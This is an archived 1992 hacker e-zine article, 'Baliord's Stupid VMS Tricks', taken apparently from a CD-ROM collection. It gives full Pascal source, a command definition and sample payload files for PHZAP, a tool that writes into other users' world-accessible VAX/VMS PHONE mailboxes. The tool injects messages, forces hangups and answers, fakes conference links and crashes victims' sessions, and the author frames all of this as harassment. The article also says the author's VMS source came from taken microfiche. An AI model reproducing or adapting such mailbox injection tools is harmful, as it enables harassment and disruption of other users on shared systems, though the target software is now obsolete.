Hacker Chronicles 1

home *** CD-ROM | disk | FTP | other *** search

/ Hacker Chronicles 1 / HACKER1.ISO / miscpub1 / phun506.txt < prev next >

Wrap

Text File | 1992-09-26 | 15KB | 360 lines

Baliord's Stupid VMS Tricks Vol 1: PHONE ---------------------------------------- By Baliord Phile #6 of P/HUN Magazine Issue #5 This program is the culmination of about a month's research, debugging, and coding. Any bugs in it are my fault, but I am not liable for them since I am not running it (or compiling it) on your system. You accept all responsibility for the execution of this program by compiling it. This program is meant to show what CAN be done with the VAX/VMS PHONE program, and is a working program solely for the purpose of showing that it CAN be done. Sometime in 1986 or 1987, a friend of mine quit a job working with a record company. In the process of leaving, he managed to pick up a copy of the VAX/VMS 4.0 source code on microfiche. Since then, he has gotten 2 more editions. He unfortunately doesn't understand the code, but just likes to have it around as proof of his "abilities." Once he acquired a second copy of the code, I requested his earlier edition. He gave it to me freely. In the middle of 1988, a "user" at my local college approached me and said that his PHONE conversations were being tapped. I laughed, and told them that it was impossible. They persisted, and thus I foraged into the realm of VMS PHONE discovery. Upon reading the source code for PHONE, I discovered that it was the funniest, and most interestingly written (and commented) program in the deck. I discovered that, 1) PHONE was designed with a RECORD feature that would allow users to record conversations (and inform the other party that a recording was occurring), and that 2) the mailboxes created by the phone program were completely world accessible, as well as being easily discovered; and that 3) for some reason DEC had commented out ONE LINE from PHONE, making it unable to RECORD, but still including the code to do so in the program. The other thing that was in the PHONE source was a list of the control codes that would force the program to do various things. Surprisingly, the commands typed at the keyboard were treated the same as characters recieved through the mailboxes. Needless to say, I immediately started considering ways to access them. After a bit of debugging, hacking, and causing some horrible errors to appear on other people's terminals, the program here was written. The first program is the actual PASCAL source code for the message sender; the next program is the .CLD file you should create to use the program; the next thing is a list of the format and the method used in creating your own file to send. The last file is a few sample files to be created to demonstrate the things that can be done. An interesting point is that the CALLING user creates the mailbox FOR the called user. This means that an answering machine program can be written that will recieve messages, and hang up without needing the user to watch over it. Of course the user must be logged in, but they need not recieve phone calls to get their messages! I have written a program to do this, and it may be published in the future. Oh yes, the method for finding out what users are currently using the phone system is to: SHOW LOG PHN$*/SYS This works because PHONE creates systemwide logical names formatted as PHN$<username>. The following is the method for using the PHZAP program... Lines that begin with ';' are comments... $ SET COMMAND PHZAP ; This enables the command... $ SHOW LOG PHN$* "PHN$GOD" = "_MBAxxx" "PHN$DEVIL" = "_MBAxxx" ; As I just said, that lists out who's using the system... $ ZAP GOD/TYPE=MSG/MESSAGE="Personally? I think you goofed off for six days" $ ZAP GOD/TYPE=MSG/MESSAGE=" then pulled an all-nighter!~" ; Drops up the message on His screen. $ ZAP DEVIL/TYPE=MSG/MESSAGE="\And I said, Let There Be Light! And YOU got" $ ZAP DEVIL/TYPE=MSG/MESSAGE="hung up!" $ ZAP DEVIL/TYPE=CMD/MESSAGE="HANGUP" ; Places the message on It's screen, then forces It to HANGUP. $ ZAP GOD/TYPE=CMD/MESSAGE="HELP SWITCH_HOOK" ; This command teaches Him a bit about Switch Hooks, by forcing Him into ; help... -------------------------------------------------------------------------- If you get the feeling that I'm a bit anti-religious, and that those capital letters are smotheringly sarcastic... You're smarter than you look! --------------------------------------------------------------------------- PHZAP.PAS follows: [ INHERIT( 'SYS$LIBRARY:STARLET' ) ] {*************************************************************************} {* If you are going to use this program, please leave this message *} {* in the file. When referring to this program, give credit where *} {* credit is due. *} {* -- Baliord *} {*************************************************************************} program Phone_Phool(output,phzap); const max = 132; type string_type = VARYING[ MAX ] OF CHAR; word_type = [ word ]0..65535; var MAILBOX_NAME : STRING_TYPE; mailbox_channel : word_type; MsgStr,Send_File, command, mailbox_device_name : string_type; length : integer; phZAP: text; [external,asynchronous] procedure cli$get_value ( entity: packed array [$L7..$U7:integer] of char := %immed 0; var retdesc : Varying [$R0] of char) ; external; [ asynchronous ] function lib$sys_trnlog( %descr logical_name : varying[ l1 ] of char; %ref name_length : integer := %immed 0; %descr equivalence : varying[ l2 ] of char; %ref table : integer := %immed 0 ) : integer; external; [external,asynchronous] function cli$present( entity: packed array [$L7..$U7:integer] of char := %immed 0):Integer; external; { The following procedure checks to find out who you want hit with a message, and opens their phone mailbox and sends the command to it. } Procedure Send(Command:String_Type); Begin Cli$get_value('USER',Mailbox_Name); Mailbox_Name:='PHN$'+Mailbox_Name; if lib$sys_trnlog(mailbox_name,length,mailbox_device_name)>ss$_normal then writeln( 'Mailbox ', mailbox_name, ' does not exist.' ) else begin mailbox_device_name.length := length; $assign( mailbox_device_name, mailbox_channel ); { Assign channel } $qio( , mailbox_channel, io$_writevblk + io$m_noformat + io$m_now, ,,, command.body, command.length, ); { Send command. } end; End; { This procedure adds the "smb_cmd" (symbiont Command) function to the beginning of a message. This forces the message you send to be interpreted by PHONE as a command typed by the user. } Procedure Snd_Cmd(Y:String_Type); Var X:Integer; Begin Y:=Y+chr(13); Y:=chr(3)+Y+chr(0); Send(Y); End; { Here we convert the string from the plaintext given by the ZAPper to the string that will be sent to the poor desperate user. It converts the '~' character into a carraige return, the '\' into a ^L (which clears the screen) and the "|" into a ^W which repaints the screen. } Procedure Snd_Msg(Y:String_Type); Var X:Integer; Begin X:=1; While X<>0 do Begin X:=Index(Y,'~'); If X<>0 then Y[X]:=chr(13); End; X:=Index(Y,'\'); If X<>0 then Y[X]:=chr(12); X:=Index(Y,'|'); If X<>0 then Y[X]:=chr(23); Y:=chr(2)+Y+chr(0); Send(Y); End; Begin (** MAIN PROGRAM **) if cli$present('MESSAGE')<>229872 then cli$get_value('MESSAGE',msgstr); { If the person is sending a message then it will be in the MSG area. } if cli$present('TYPE')<>229872 then cli$get_value('TYPE',Send_File) else Send_File:='ACCVIO.PHN'; { If the /TYPE= is not specified then it tries to force the user's PHONE program to crash with an ACCESS VIOLATION... (a nice, frightening trick to play on a poor user. It is normally possible to send a file through this command, BUT you must know the format... } IF SEND_FILE='CMD' then SND_CMD(MSGSTR) ELSE If Send_File='MSG' then SND_MSG(MsgStr) Else BEGIN if Index(Send_File,'.')=0 then Send_File:=Send_File+'.PHN'; Cli$get_value('USER',Mailbox_Name); Mailbox_Name:='PHN$'+Mailbox_Name; if lib$sys_trnlog(mailbox_name,length,mailbox_device_name)> ss$_normal then writeln( 'Mailbox ', mailbox_name, ' does not exist.' ) else begin OPEN(FILE_VARIABLE:=PHZAP ,FILE_NAME:=SEND_FILE ,HISTORY:=OLD ,DEFAULT:='[]'); { Replace this with the default dir } { you will be most often using...} mailbox_device_name.length := length; $assign( mailbox_device_name, mailbox_channel ); { Assign channel } reset(phZAP); repeat readln(phZAP,command); $qio( , mailbox_channel, io$_writevblk + io$m_noformat + io$m_now, ,,, command.body, command.length, ); { Send command. } until eof(phZAP) end; END; end. ------------------------------------------------------------------------------ PHZAP.CLD follows: MODULE PHZAP_COMMAND Define Verb Zap Image "[{directory}]PHZAP.EXE" ; ^^ Convert this to the directory the program will be in ; and then delete these three lines. ; Qualifier Type,Value Parameter P1,Label=User,Value(Required),Prompt="Username" Qualifier Message,Value ----------------------------------------------------------------------------- The format for a simple file is <cmd-char>NODE::USERNAME<CHR(0)><msg-char> You can force a message to a person's screen by one of two methods, the first is using the above format and writing your message in the <msg-char> section of the packet using <listen>. This requires writing it character by character. The other option is to send the KBD_ROUTE command along with the message in normal text (with a <CHR(0)> at the end of course.) The CMD_PARSE command allows you to force a command on the user, through their PHONE program. It only works for commands within PHONE, however, so you cannot make them log out or such, only kick them out of phone. The ANSWERED flag is useful in writing an answering machine, in that you send <answered>NODE::<answering user><CHR(0)> and the calling PHONE program will pop up the second screen as if the person had answered. BUSY is also a nice one to be able to send (as well as rejected!) If you send a <hangup>NODE::<hanging user><CHR(0)> ONLY THE USER YOU HIT with PHZAP will see that user as hung-up! The other user (who supposedly hung up) will still see the other user listed on their screen! (Nothing typed will reach them of course, but it is an interesting mindfuck!) The <facsimile><msg-text><CHR(0)> is (if I remember correctly) the proper method for FAXing something over the VAX PHONE. The <held>NODE::<holding user><CHR(0)> command puts the user you hit on HOLD in that user's eyes, but not to the "holding user." Sending a <forced-link>NODE::<user #1><CHR(0)>NODE::<user #2><CHR(0)> will pretend to create a link between the user you are ZAPping and user #2. Both users **MUST** be logged in, but not necessarily in PHONE! Thus you can force a link between a user and <login> just to freak them out! An example of this is given below. The codes I haven't discussed are either too weird/complex to handle easily, or I just don't know how to use them. (or have never bothered.) kbd_get = chr (1); kbd_route = chr (2); cmd_parse = chr (3); talk = chr (4); help2 = chr (5); ring_out = chr (6); slave_verify = chr (7); rang_in = chr (8); hangup = chr (9); busy = chr (10); answered = chr (11); rejected = chr (12); slave_done = chr (13); listen = chr (14); directory2 = chr (15); facsimile2 = chr (16); forced_link = chr (17); held = chr (18); unheld = chr (19); ---------------------------------------------------------------------------- Some sample .PHN files follow... <nn> is used to refer to <CHR(nn)>... FOFF.PHN <04>Lemme ALONE dammit!!<00> This drops a message in the users OWN message area as if he had typed it to send to somebody. They don't even have to be connected to somebody for you to do this. It's most useful when someone is calling you and you want to tell them to call back later. FYOU.PHN <14>HEAVEN::GOD<00>F <14>HEAVEN::GOD<00>u <14>HEAVEN::GOD<00>c <14>HEAVEN::GOD<00>k <14>HEAVEN::GOD<00> <14>HEAVEN::GOD<00>Y <14>HEAVEN::GOD<00>o <14>HEAVEN::GOD<00>u <14>HEAVEN::GOD<00>! This sends a message to a user in the standard way, as if someone had typed it. This is also the method that is in the mailboxes used by PHONE, so if you want to write an answering machine, you have to parse that pattern. ACCVIO.PHN <15>HEAVEN::GOD<00> That causes Acess Violation errors to flow down the users screen. Don't ask me why; I don't know. Does it under V4.6 of VMS, others I'm not sure. LINKUP.PHN <16>HEAVEN::DEVIL<00>HEAVEN::GOD<00> After send that to a user's mailbox, their screen should flash with the "DEVIL has created a conference call with GOD" message. Both users MUST exist and be logged on currently. If you want to add yourself into a conversation go into phone, have someone "link" you with their conversation and then have someone link them with you... It must be done to both. Of course you could always use this... ANSWER.PHN <03>ANSWER<0> That will force an ANSWER command from the keyboard into the COMMAND buffer. If you have a friend do that to them, as you are phoning them, then they will be connected without the chance of them rejecting! <Then you have your friend start linking all the phone conversations on the system by one person each!> I think that's enough examples for you to be able to figure out the format for the rest yourself. If you have questions about this, or any other program you have seen my name on, or you have VAX specific questions, I am available on The Toll Center BBS @ (718) 358-9209 and the Rogue's Gallery BBS @ (516) 361-9846. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Downloaded From P-80 International Information Systems 304-744-2253 12yrs+